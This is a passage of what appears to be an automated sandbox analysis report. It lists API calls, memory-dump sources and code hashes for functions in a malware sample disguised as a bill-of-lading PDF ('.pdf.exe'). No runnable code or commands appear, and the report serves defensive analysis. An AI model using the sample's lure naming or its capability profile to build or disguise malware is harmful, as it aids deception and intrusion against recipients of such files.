                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1413079979-0
                                                                                                                      • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                      • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                                                      • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                      • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                                                      Function 0041415E Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                                                      • __calloc_crt.LIBCMT ref: 0041419B
                                                                                                                      • __getptd.LIBCMT ref: 004141A8
                                                                                                                      • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                                                      • __dosmaperr.LIBCMT ref: 00414201
                                                                                                                        • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                        • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1803633139-0
                                                                                                                      • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                      • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                                                      • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                      • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                                                      Function 004555E0 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3275902921-0
                                                                                                                      • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                      • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                                                      • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                      • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                                                      Function 004554C0 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32 ref: 004554DF
                                                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3691411573-0
                                                                                                                      • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                                                      • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                                                                                                                      • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                                                      • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                                                                                                                      Function 0043609C Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1814673581-0
                                                                                                                      • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                      • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                                                      • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                      • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                                                      Function 00436272 Relevance: 9.1, APIs: 6, Instructions: 59sleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2833360925-0
                                                                                                                      • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                      • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                                                      • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                      • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                                                      Function 004471EC Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                        • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                        • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                        • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                                                      • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                                                      • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                                                      • EndPath.GDI32(?), ref: 0044724E
                                                                                                                      • StrokePath.GDI32(?), ref: 0044725C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 372113273-0
                                                                                                                      • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                      • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                                                      • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                      • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                                                      Function 00410940 Relevance: 9.0, APIs: 6, Instructions: 49keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4278518827-0
                                                                                                                      • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                      • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                                                                      • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                      • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                                                                      Function 0044CBD3 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1035833867-0
                                                                                                                      • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                      • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                                                                      • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                      • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                                                                      Function 0044B64F Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                                                      • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                                                      • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                                                        • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                                                      • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                                                      • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3495660284-0
                                                                                                                      • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                      • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                                                      • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                      • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                                                      Function 00437118 Relevance: 9.0, APIs: 6, Instructions: 37windowtimethreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 839392675-0
                                                                                                                      • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                      • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                                                      • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                      • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                                                      Function 0043604B Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,00000004), ref: 00436055
                                                                                                                      • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                                                      • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                                                      • GetLastError.KERNEL32 ref: 00436081
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1690418490-0
                                                                                                                      • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                      • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                                                                      • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                      • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                                                                      Function 00475ACA Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 237comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                                                      • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                                                      • CoUninitialize.OLE32 ref: 00475D71
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                      • String ID: .lnk$HH
                                                                                                                      • API String ID: 886957087-3121654589
                                                                                                                      • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                      • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                                                                      • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                      • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                                                                      Function 0045F132 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                      • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                      • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                                                                      • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                      • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                                                                      Function 004692E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98windowCOMMON
                                                                                                                      Download Yara Rule
